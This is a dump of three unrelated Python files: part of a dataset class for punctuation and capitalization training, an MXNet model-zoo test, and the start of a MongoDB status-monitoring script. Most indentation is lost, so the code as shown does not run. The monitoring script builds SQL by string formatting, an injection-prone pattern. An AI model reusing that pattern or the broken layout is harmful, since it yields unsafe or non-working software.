has to be ``True``. In PyTorch Lightning spawning is performed when `Trainer.fit()
<https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html#fit>`_ or
`Trainer.test() <https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html#test>`_
are called.
        cache_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where cache (pickled features)
            is stored. By default, the ``text_file`` parent directory is used. This parameter is useful if the dataset
            directory is read-only and you wish to pickle features. In such a case, pass a writable directory in the
            ``cache_dir`` parameter.
get_label_frequencies (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to print and save label
            frequencies. Frequencies are shown if the ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into ``label_info_save_dir`` directory.
        label_info_save_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where label frequencies
            are saved. By default, the ``text_file`` parent directory is used. When the method
            :meth:`save_labels_and_get_file_paths` is called, label ids are saved into the ``label_info_save_dir``
            directory. Parameters ``cache_dir`` and ``label_info_save_dir`` are added for cases when the directory
            containing ``text_file`` is read-only.
punct_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): a path to a .csv file containing
punctuation label vocabulary. Each line in such a vocabulary file contains exactly one label. The first
line has to contain `pad_label`, otherwise error will be raised.
capit_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): same as ``punct_label_vocab_file`` for
capitalization labels.
add_masks_and_segment_ids_to_batch (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to add
``'loss_mask'``, ``'input_mask'``, ``'segment_ids'`` items to a batch. Useful for creation of tarred
dataset and can NOT be used during model training and inference.
verbose (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to show data examples, label stats and
other useful information.
n_jobs (:obj:`int`, `optional`, defaults to :obj:`0`): number of workers used for tokenization, encoding
labels, creating "first token in word" mask, and clipping. If ``n_jobs <= 0`` data preparation is performed
without multiprocessing. By default ``n_jobs`` is equal to the number of CPUs.
.. warning::
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
tokenization_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting tokenization
progress. Useful for creation of tarred dataset
batch_mark_up_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
deciding which samples batches will contain. Useful for creation of tarred dataset
batch_building_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
batch creation (stacking and padding). Useful for creation of tarred dataset
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports. """
return {
'input_ids': NeuralType(('B', 'T'), ChannelType()),
'segment_ids': NeuralType(('B', 'T'), ChannelType()),
'input_mask': NeuralType(('B', 'T'), MaskType()),
'subtokens_mask': NeuralType(('B', 'T'), MaskType()),
'loss_mask': NeuralType(('B', 'T'), MaskType()),
'punct_labels': NeuralType(('B', 'T'), LabelsType()),
'capit_labels': NeuralType(('B', 'T'), LabelsType()),
}
def __init__(
self,
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
max_seq_length: int,
tokenizer: TokenizerSpec,
num_samples: int = -1,
tokens_in_batch: int = 5000,
pad_label: str = 'O',
punct_label_ids: Optional[Dict[str, int]] = None,
capit_label_ids: Optional[Dict[str, int]] = None,
ignore_extra_tokens: bool = False,
ignore_start_end: bool = True,
use_cache: bool = True,
cache_dir: Optional[Union[str, os.PathLike]] = None,
get_label_frequencies: bool = False,
label_info_save_dir: Optional[Union[str, os.PathLike]] = None,
punct_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
capit_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
add_masks_and_segment_ids_to_batch: bool = True,
verbose: bool = True,
n_jobs: Optional[int] = 0,
tokenization_progress_queue: Optional[mp.Queue] = None,
batch_mark_up_progress_queue: Optional[mp.Queue] = None,
batch_building_progress_queue: Optional[mp.Queue] = None,
) -> None:
""" Initializes BertPunctuationCapitalizationDataset. """
self._check_constructor_parameters(
text_file,
labels_file,
punct_label_ids,
capit_label_ids,
punct_label_vocab_file,
capit_label_vocab_file,
num_samples,
use_cache,
)
if punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
punct_label_ids = load_label_ids(punct_label_vocab_file)
if capit_label_vocab_file is not None:
capit_label_vocab_file = Path(capit_label_vocab_file).expanduser()
capit_label_ids = load_label_ids(capit_label_vocab_file)
text_file, labels_file = Path(text_file).expanduser(), Path(labels_file).expanduser()
if label_info_save_dir is None:
self.label_info_save_dir = text_file.parent
else:
self.label_info_save_dir = Path(label_info_save_dir).expanduser()
self.tokens_in_batch = tokens_in_batch
self.tokenizer = tokenizer
self.pad_label = pad_label
self.ignore_extra_tokens = ignore_extra_tokens
self.ignore_start_end = ignore_start_end
self.add_masks_and_segment_ids_to_batch = add_masks_and_segment_ids_to_batch
self.verbose = verbose
self.batch_mark_up_progress_queue = batch_mark_up_progress_queue
self.batch_building_progress_queue = batch_building_progress_queue
master_device = not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0
features_pkl = self._get_path_to_pkl_features(text_file, cache_dir, max_seq_length, num_samples)
features = None
if master_device and not (features_pkl.is_file() and use_cache):
if verbose:
logging.info(f'Processing {text_file}')
res = self._read_dataset(text_file, labels_file, num_samples)
text_lines, punct_label_lines, capit_label_lines, punct_unique_labels, capit_unique_labels = res
if punct_label_ids:
self._check_label_ids_vs_unique_labels(
punct_label_ids, punct_unique_labels, 'punct', 'punctuation', labels_file
)
else:
punct_label_ids = create_label_ids(punct_unique_labels, self.pad_label)
if capit_label_ids:
self._check_label_ids_vs_unique_labels(
                    capit_label_ids, capit_unique_labels, 'capit', 'capitalization', labels_file
)
else:
capit_label_ids = create_label_ids(capit_unique_labels, self.pad_label)
features = _get_features(
text_lines,
punct_label_lines,
capit_label_lines,
max_seq_length,
self.tokenizer,
pad_label=self.pad_label,
punct_label_ids=punct_label_ids,
capit_label_ids=capit_label_ids,
verbose=self.verbose,
progress_queue=tokenization_progress_queue,
n_jobs=n_jobs,
)
if use_cache:
features_pkl.parent.mkdir(parents=True, exist_ok=True)
pickle.dump(tuple(list(features) + [punct_label_ids, capit_label_ids]), open(features_pkl, "wb"))
if self.verbose:
logging.info(f'Features saved to {features_pkl}')
# wait until the master process writes to the processed data files
if torch.distributed.is_initialized():
torch.distributed.barrier()
if features is None:
features = pickle.load(open(features_pkl, 'rb'))
li = features[-2:]
self._check_label_ids_loaded_from_pkl(
punct_label_ids, capit_label_ids, *li, punct_label_vocab_file, capit_label_vocab_file, features_pkl
)
punct_label_ids, capit_label_ids = li[-2], li[-1]
if tokenization_progress_queue is not None:
tokenization_progress_queue.put(len(features[0]))
if self.verbose:
logging.info(f'Features restored from {features_pkl}')
features = features[:-2]
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels = features
self.punct_label_ids, self.capit_label_ids = punct_label_ids, capit_label_ids
self.batches = self._pack_into_batches(
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
if get_label_frequencies:
self.punct_label_frequencies = self._calculate_and_save_label_frequencies(self.punct_labels, 'punct')
self.capit_label_frequencies = self._calculate_and_save_label_frequencies(self.capit_labels, 'capit')
def _get_path_to_pkl_features(
self, text_file: Path, cache_dir: Optional[Union[str, os.PathLike]], max_seq_length: int, num_samples: int
) -> Path:
if cache_dir is None:
cache_dir = text_file.parent
else:
cache_dir = Path(cache_dir).expanduser()
vocab_size = getattr(self.tokenizer, "vocab_size", 0)
features_pkl = cache_dir / "cached.{}.{}.max_seq_length{}.vocab{}.{}.punctuation_capitalization.pkl".format(
text_file.stem,
self.tokenizer.name,
max_seq_length,
vocab_size,
f'num_samples{num_samples}' if num_samples > 0 else 'all_samples',
)
return features_pkl
@staticmethod
def _check_constructor_parameters(
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
punct_label_vocab_file: Union[str, os.PathLike],
capit_label_vocab_file: Union[str, os.PathLike],
num_samples: int,
use_cache: bool,
) -> None:
if torch.distributed.is_initialized() and torch.distributed.get_world_size() > 1 and not use_cache:
raise ValueError(
f"If you already created process group and the world size is greater than 1, then `use_cache` "
f"parameter has to `True`. Only master process prepares features and if `use_cache=False`, then "
f"other processes will not be able to obtain features. Alternatively, you may set `use_cache=False` "
f"and set up data before spawning processes. Use `cache_dir` dataset directory with "
f"`text_file` and `labels_file` is read-only."
)
if not (os.path.exists(text_file) and os.path.exists(labels_file)):
raise FileNotFoundError(
f'{text_file} or {labels_file} not found. The data should be split into 2 files: text.txt and'
f'labels.txt. Each line of the text.txt file contains text sequences, where words are separated with'
f'spaces. The labels.txt file contains corresponding labels for each word in text.txt, the labels are'
f'separated with spaces. Each line of the files should follow the format:\n'
f' [WORD] [SPACE] [WORD] [SPACE] [WORD] (for text.txt) and '
f' [LABEL] [SPACE] [LABEL] [SPACE] [LABEL] (for labels.txt).'
)
if not str(text_file).endswith('.txt'):
raise ValueError(
f"Parameter `text_file` has to be path to a file with .txt extension, whereas `text_file={text_file}`"
)
if not str(labels_file).endswith('.txt'):
raise ValueError(
f"Parameter `labels_file` has to be path to a file with .txt extension, whereas "
f"`labels_file={labels_file}`"
)
if punct_label_ids is not None and punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
file_punct_label_ids = load_label_ids(punct_label_vocab_file)
if file_punct_label_ids != punct_label_ids:
raise_not_equal_labels_error(
first_labels=punct_label_ids,
second_labels=file_punct_label_ids,
first_labels_desc='Punctuation labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `punct_label_ids`',
second_labels_desc=f'Punctuation labels loaded from file {punct_label_vocab_file} path to which '
f'is passed in parameter `punct_label_vocab_file`',
)
if capit_label_ids is not None and capit_label_vocab_file is not None:
capit_vocab_file = Path(capit_label_vocab_file).expanduser()
file_capit_label_ids = load_label_ids(capit_vocab_file)
if file_capit_label_ids != capit_label_ids:
raise_not_equal_labels_error(
first_labels=capit_label_ids,
second_labels=file_capit_label_ids,
first_labels_desc='Capitalization labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `capit_label_ids`',
second_labels_desc=f'Capitalization labels loaded from file {capit_label_vocab_file} path to '
f'which is passed in parameter `capit_label_vocab_file`',
)
if num_samples == 0:
raise ValueError(
f"Parameter `num_samples` has to be positive or negative whereas `num_samples={num_samples}`. "
f"Negative `num_samples` is for using all samples in a dataset."
)
@staticmethod
def _check_label_ids_loaded_from_pkl(
parameter_punct_label_ids: Dict[str, int],
parameter_capit_label_ids: Dict[str, int],
pkl_punct_label_ids: Any,
pkl_capit_label_ids: Any,
punct_label_vocab_file: Optional[Path],
capit_label_vocab_file: Optional[Path],
features_file: Path,
) -> None:
if not isinstance(pkl_punct_label_ids, dict):
raise ValueError(
f"Punctuation label ids loaded from features file {features_file} has wrong type "
f"{type(pkl_punct_label_ids)}"
)
if parameter_punct_label_ids is not None:
if parameter_punct_label_ids != pkl_punct_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_punct_label_ids,
second_labels=pkl_punct_label_ids,
first_labels_desc="Punctuation labels passed in parameter `punct_label_ids`"
if punct_label_vocab_file is None
else f"Punctuation labels loaded from file {punct_label_vocab_file}",
second_labels_desc=f"Punctuation label ids loaded from features file {features_file}",
)
if not isinstance(pkl_capit_label_ids, dict):
raise ValueError(
f"Capitalization label ids loaded from features file {features_file} has wrong type "
f"{type(pkl_capit_label_ids)}"
)
if parameter_capit_label_ids is not None:
if parameter_capit_label_ids != pkl_capit_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_capit_label_ids,
second_labels=pkl_capit_label_ids,
first_labels_desc="Capitalization labels passed in parameter `capit_label_ids`"
if capit_label_vocab_file is None
else f"Capitalization labels loaded from file {capit_label_vocab_file}",
second_labels_desc=f"Capitalization label ids loaded from features file {features_file}",
)
@staticmethod
def _check_label_ids_vs_unique_labels(
label_ids: Dict[str, int], unique_labels: Set[str], label_type: str, task: str, label_file: Path
) -> None:
if unique_labels - set(label_ids):
not_present_labels = list(unique_labels - set(label_ids))
raise ValueError(
f"{len(not_present_labels)} {task} labels found in {label_file} are not present in "
f"`{label_type}_label_ids`. Examples of unexpected labels from {label_file}: {not_present_labels[:3]}"
)
@staticmethod
def _read_dataset(
text_file: Path, labels_file: Path, num_samples: int
) -> Tuple[Tuple[str, ...], Tuple[str, ...], Tuple[str, ...], Set[str], Set[str]]:
with open(text_file, 'r') as f:
text_lines = f.readlines()
punct_unique_labels, capit_unique_labels = set(), set()
punct_labels_lines, capit_labels_lines = [], []
with labels_file.open() as f:
for i, line in enumerate(f):
pairs = line.split()
if not all([len(p) == 2 for p in pairs]):
raise ValueError(
f"Some label pairs are not pairs but have wrong length (!= 2) in line {i} in label file "
f"{labels_file}"
)
words = text_lines[i].split()
if len(pairs) != len(words):
raise ValueError(
f"In line {i} in text file {text_file} number of words {len(words)} is not equal to the "
f"number of labels {len(pairs)} in labels file {labels_file}."
)
punct_line, capit_line = zip(*pairs)
punct_labels_lines.append(punct_line)
capit_labels_lines.append(capit_line)
punct_unique_labels.update(punct_line)
capit_unique_labels.update(capit_line)
if len(punct_labels_lines) != len(text_lines):
raise ValueError(
f"Number of text lines {len(text_lines)} in text file {text_file} is not equal to the number of lines "
f"{len(punct_labels_lines)} in labels file {labels_file}."
)
dataset = list(zip(text_lines, punct_labels_lines, capit_labels_lines))
if len(dataset) == 0:
raise ValueError(f"Dataset loaded from files {text_file} and {labels_file} is empty.")
if num_samples > 0:
dataset = dataset[:num_samples]
text_lines, punct_labels_lines, capit_labels_lines = zip(*dataset)
return text_lines, punct_labels_lines, capit_labels_lines, punct_unique_labels, capit_unique_labels
def _mark_up_batches(self, input_ids: List[np.ndarray]) -> Tuple[List[int], List[int], List[int]]:
"""
        Computes indices of the first samples of batches, batch sizes, and padded sequence lengths for all batches.
        ``input_ids`` has to be sorted by number of tokens in ascending order.
        Batches are marked up with respect to the following conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
        If ``self.batch_mark_up_progress_queue`` is not None, then mark-up progress is reported via
        ``self.batch_mark_up_progress_queue``. Otherwise, a ``tqdm`` instance is created in this function.
Args:
input_ids: a list of 1D int32 arrays. Elements of ``input_ids`` have to be sorted by length in ascending
order
Returns:
batch_beginnings: a list of indices in ``input_ids`` of first samples of every batch
batch_sizes: a list of numbers of samples in batches
batch_seq_lengths: a list of sequence lengths after padding for every batch
"""
batch_beginnings, batch_sizes, batch_seq_lengths = [], [], []
current_max_length = 0
start = 0
if self.batch_mark_up_progress_queue is None:
inp_iterator = tqdm(enumerate(input_ids), total=len(input_ids), desc="Batch mark up", unit="query")
else:
inp_iterator = enumerate(input_ids)
progress_made = 0
for i, inp in inp_iterator:
current_max_length = max(current_max_length, ceil(len(inp) / 8) * 8)
if current_max_length * (i + 1 - start) > self.tokens_in_batch:
batch_size = (i - start) // 8 * 8
if batch_size == 0:
if i > start:
batch_size = i - start
logging.warning(
f"Could not create batch with multiple of 8 size. Probably there is a too long sequence in "
f"the dataset. current_max_length={current_max_length}. Batch size will be reduced to "
f"{batch_size}. tokens_in_batch={self.tokens_in_batch}. The batch includes sequences from "
f"{start} to {i - 1}."
)
else:
logging.warning(
f"Input sequence number {i - 1} is too long. Could not fit it into batch with "
f"{self.tokens_in_batch} tokens. Sequence number {i - 1} will not be added to batches."
)
start = i
current_max_length = ceil(len(inp) / 8) * 8
continue
seq_length = ceil(max([len(inp) for inp in input_ids[start : start + batch_size]]) / 8) * 8
batch_beginnings.append(start)
batch_sizes.append(batch_size)
batch_seq_lengths.append(seq_length)
start += batch_size
current_max_length = ceil(max([len(inp) for inp in input_ids[start : i + 1]]) / 8) * 8
if self.batch_mark_up_progress_queue is not None:
progress_made += 1
if progress_made >= BATCH_MARK_UP_PROGRESS_REPORT_PERIOD:
self.batch_mark_up_progress_queue.put(progress_made)
progress_made = 0
if start < len(input_ids):
seq_length = ceil(max([len(inp) for inp in input_ids[start:]]) / 8) * 8
batch_beginnings.append(start)
batch_sizes.append(len(input_ids) - start)
batch_seq_lengths.append(seq_length)
if self.batch_mark_up_progress_queue is not None:
self.batch_mark_up_progress_queue.put(progress_made)
assert sum(batch_sizes) == len(input_ids)
for i in range(len(batch_beginnings) - 1):
assert batch_beginnings[i] + batch_sizes[i] == batch_beginnings[i + 1]
assert batch_seq_lengths[i] >= max(
[len(inp) for inp in input_ids[batch_beginnings[i] : batch_beginnings[i] + batch_sizes[i]]]
)
return batch_beginnings, batch_sizes, batch_seq_lengths
def _pack_into_batches(
self,
input_ids: List[np.ndarray],
subtokens_mask: List[np.ndarray],
punct_labels: List[np.ndarray],
capit_labels: List[np.ndarray],
) -> List[Dict[str, np.ndarray]]:
"""
        Shuffles input sequences, sorts them by number of tokens, pads, and packs them into batches which satisfy
        the following conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
Created batches are shuffled before returning.
If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then ``'segment_ids'``, ``'loss_mask'``, and
``'input_mask'`` are added to the batch.
If ``self.batch_building_progress_queue`` is not ``None``, then padding progress is reported to
        ``self.batch_building_progress_queue``. Otherwise, a new ``tqdm`` instance is created in the
        ``_pack_into_batches`` method.
Args:
input_ids: a list of 1D int32 arrays which contain token ids of dataset source
subtokens_mask: a list of 1D boolean arrays which elements are ``True`` if corresponding token is the
first token in some word
punct_labels: a list of 1D int32 arrays which contain encoded punctuation labels
capit_labels: a list of 1D int32 arrays which contain encoded capitalization labels
Returns:
a list of batches. Each batch is a dictionary with items:
- ``'input_ids'``: a ``np.int32`` numpy array;
- ``'subtokens_mask'``: a boolean numpy array;
- ``'punct_labels'``: a ``np.int32`` numpy array;
- ``'capit_labels'``: a ``np.int32`` numpy array.
            If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then a batch also contains the items
- ``'segment_ids'``: a ``np.int8`` numpy array;
- ``'input_mask'``: a boolean numpy array;
- ``'loss_mask'``: a boolean numpy array.
The values of a batch dictionary are numpy arrays of identical shape.
"""
zipped = list(zip(input_ids, subtokens_mask, punct_labels, capit_labels))
random.shuffle(zipped)
input_ids, subtokens_mask, punct_labels, capit_labels = zip(*sorted(zipped, key=lambda x: x[0].shape[0]))
batch_beginnings, batch_sizes, batch_seq_lengths = self._mark_up_batches(input_ids)
batches = []
if self.batch_building_progress_queue is None:
inp_iterator = tqdm(
zip(batch_beginnings, batch_sizes, batch_seq_lengths),
total=len(batch_beginnings),
desc="Batch building",
unit="batch",
)
else:
# In this case we report number of queries not number of batches
inp_iterator = zip(batch_beginnings, batch_sizes, batch_seq_lengths)
progress_made = 0
for start, size, length in inp_iterator:
batch_input_ids = pad(input_ids[start : start + size], length, self.tokenizer.pad_id)
batch_subtokens_mask = pad(subtokens_mask[start : start + size], length, False)
batch = {
"input_ids": batch_input_ids,
"subtokens_mask": batch_subtokens_mask,
"punct_labels": pad(
punct_labels[start : start + size], length, self.punct_label_ids[self.pad_label]
).astype(np.int64),
"capit_labels": pad(
capit_labels[start : start + size], length, self.capit_label_ids[self.pad_label]
).astype(np.int64),
}
if self.add_masks_and_segment_ids_to_batch:
batch_segment_ids, batch_input_mask, batch_loss_mask = create_masks_and_segment_ids(
batch_input_ids,
batch_subtokens_mask,
self.tokenizer.pad_id,
self.tokenizer.cls_id,
self.tokenizer.sep_id,
self.ignore_start_end,
self.ignore_extra_tokens,
)
batch['segment_ids'] = batch_segment_ids
batch['input_mask'] = batch_input_mask
batch['loss_mask'] = batch_loss_mask
batches.append(batch)
if self.batch_building_progress_queue is not None:
progress_made += size
if progress_made >= BATCH_BUILDING_PROGRESS_REPORT_PERIOD:
self.batch_building_progress_queue.put(progress_made)
progress_made = 0
if self.batch_building_progress_queue is not None:
self.batch_building_progress_queue.put(progress_made)
random.shuffle(batches)
return batches
def repack_batches_with_shuffle(self) -> None:
"""A function for proper shuffling of a dataset. Pytorch data loader shuffing will only permute batches."""
logging.info("Shuffling training dataset")
self.batches = self._pack_into_batches(
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
def _calculate_and_save_label_frequencies(self, all_labels: List[np.ndarray], name: str) -> Dict[str, float]:
"""Calculates and saves labels frequencies in :attr:`label_info_save_dir`."""
merged_labels = itertools.chain.from_iterable(all_labels)
if self.verbose:
logging.info('Three most popular labels')
self.label_info_save_dir.mkdir(parents=True, exist_ok=True)
_, label_frequencies, _ = get_label_stats(
merged_labels, str(self.label_info_save_dir / f'label_count_{name}.tsv')
)
return label_frequencies
def save_labels_and_get_file_paths(
self, punct_labels_file_name: str, capit_labels_file_name: str
) -> Tuple[Path, Path]:
"""
Saves label ids into files located in ``self.label_info_save_dir``. Saved label ids are usually used for
``.nemo`` checkpoint creation.
        The signature of this method and the signature of the method
:meth:`~nemo.collections.nlp.data.token_classification.BertPunctuationCapitalizationTarredDataset.save_labels_and_get_file_paths`
must be identical.
Args:
punct_labels_file_name (:obj:`str`): a name of a punctuation labels file
capit_labels_file_name (:obj:`str`): a name of a capitalization labels file
Returns:
:obj:`Tuple[pathlib.Path, pathlib.Path]`: a tuple containing:
- :obj:`pathlib.Path`: a path to the saved punctuation labels file
- :obj:`pathlib.Path`: a path to the saved capitalization labels file
"""
nemo_dir = self.label_info_save_dir / LABEL_ID_DIR_FOR_NEMO_CHECKPOINT
punct_labels_file = nemo_dir / punct_labels_file_name
capit_labels_file = nemo_dir / capit_labels_file_name
save_label_ids(self.punct_label_ids, punct_labels_file)
save_label_ids(self.capit_label_ids, capit_labels_file)
return punct_labels_file, capit_labels_file
def __len__(self) -> int:
return len(self.batches)
def collate_fn(self, batches: List[Dict[str, np.ndarray]]) -> Dict[str, torch.Tensor]:
"""
        Returns the zeroth batch from the ``batches`` list passed for collating and casts ``'segment_ids'``, ``'punct_labels'``,
``'capit_labels'`` to types supported by
:class:`~nemo.collections.nlp.models.token_classification.punctuation_capitalization_model.PunctuationCapitalizationModel`.
All output tensors have shape ``[Batch, Time]``.
.. warning::
A ``batch_size`` parameter of a PyTorch data loader and sampler has to be ``1``.
Args:
batches (:obj:`List[Dict[str, np.ndarray]]`): a list containing 1 batch passed for collating
Returns:
:obj:`Dict[str, torch.Tensor]`: a batch dictionary with following items (for detailed description of batch
items see method :meth:`__getitem__`):
- ``'input_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'subtokens_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'punct_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'capit_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'segment_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'input_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'loss_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor.
"""
batch = {k: torch.as_tensor(v) for k, v in batches[0].items()}
batch['segment_ids'] = batch['segment_ids'].int()
batch['punct_labels'] = batch['punct_labels'].long()
batch['capit_labels'] = batch['capit_labels'].long()
return batch
def __getitem__(self, idx: int) -> Dict[str, np.ndarray]:
"""
        Returns the batch with index ``idx``. The values of a batch dictionary are numpy arrays of identical shapes
        ``[Batch, Time]``. Labels are identical for all tokens in a word. For example, if
        - word ``'Tokenization'`` is tokenized into tokens ``['token', 'ization']``,
        - it is followed by a comma,
        then punctuation labels are ``[',', ',']`` and capitalization labels are ``['U', 'U']`` (``'U'`` is a label
        for words which start with an upper case character).
Args:
idx: an index of returned batch
Returns:
:obj:`Dict[str, np.ndarray]`: a dictionary with items:
- ``'input_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded tokens,
- ``'subtokens_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if they
correspond to first token in a word,
- ``'punct_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded punctuation
labels,
- ``'capit_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded capitalization
labels.
- ``'segment_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int8` array filled with zeros (BERT token types
in HuggingFace terminology) (if ``self.add_masks_and_segment_ids_to_batch`` is ``False``, then this
                  item is missing),
- ``'input_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if corresponding
token is not a padding token (if ``self.add_masks_and_segment_ids_to_batch`` is ``False``, then this
                  item is missing),
- ``'loss_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if loss is
computed for corresponding token. See more in description of constructor parameters
``ignore_start_end``, ``ignore_extra_tokens`` (if ``self.add_masks_and_segment_ids_to_batch`` is
                  ``False``, then this item is missing).
"""
return self.batches[idx]
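# A minimal usage sketch (illustrative only, not executed anywhere in this file): it shows how the
# ``collate_fn``/``batch_size=1`` contract documented above would typically be wired into a PyTorch
# ``DataLoader``. The ``dataset`` name below is an assumed, already constructed instance of the dataset
# class defined above; its constructor arguments are not shown in this excerpt.
#
#     from torch.utils.data import DataLoader
#
#     loader = DataLoader(
#         dataset,                        # assumed instance of the dataset class above
#         batch_size=1,                   # required: __getitem__ already returns a whole pre-built batch
#         shuffle=False,                  # reshuffle via dataset.repack_batches_with_shuffle() between epochs
#         collate_fn=dataset.collate_fn,
#     )
#     for batch in loader:
#         input_ids = batch['input_ids']          # shape [Batch, Time]
#         punct_labels = batch['punct_labels']    # torch.int64, shape [Batch, Time]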
|
test_gluon_model_zoo.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import with_seed
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@with_seed()
@pytest.mark.parametrize('model_name', [
'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
pretrained_to_test = set(['mobilenetv2_0.25'])
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
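# These parametrized tests are usually run through pytest; e.g. (invocation is illustrative):
#   pytest test_gluon_model_zoo.py -k "resnet18_v1"
# runs the forward-pass check for a single architecture, while omitting -k runs every parametrized model.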
|
check_mongodb.py
|
#!/usr/bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
import pymongo
import bson
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("wlblazers")
path='./include'
sys.path.insert(0,path)
import functions as func
from multiprocessing import Process;
def check_mongodb(host,port,user,passwd,server_id,tags):
try:
func.mysql_exec("insert into mongodb_status_his SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from mongodb_status where server_id='%s';" %(server_id),'')
func.mysql_exec("delete from mongodb_status where server_id='%s';" %(server_id),'')
#connect = pymongo.Connection(host,int(port))
client = pymongo.MongoClient(host, int(port))
db = client['admin']
db.authenticate(user,passwd)
serverStatus=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
time.sleep(1)
serverStatus_2=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
connect = 1
ok = int(serverStatus['ok'])
version = serverStatus['version']
uptime = serverStatus['uptime']
connections_current = serverStatus['connections']['current']
connections_available = serverStatus['connections']['available']
globalLock_activeClients = serverStatus['globalLock']['activeClients']['total']
globalLock_currentQueue = serverStatus['globalLock']['currentQueue']['total']
mem_bits = serverStatus['mem']['bits']
mem_resident = serverStatus['mem']['resident']
mem_virtual = serverStatus['mem']['virtual']
mem_supported = serverStatus['mem']['supported']
mem_mapped = serverStatus['mem']['mapped']
mem_mappedWithJournal = serverStatus['mem']['mappedWithJournal']
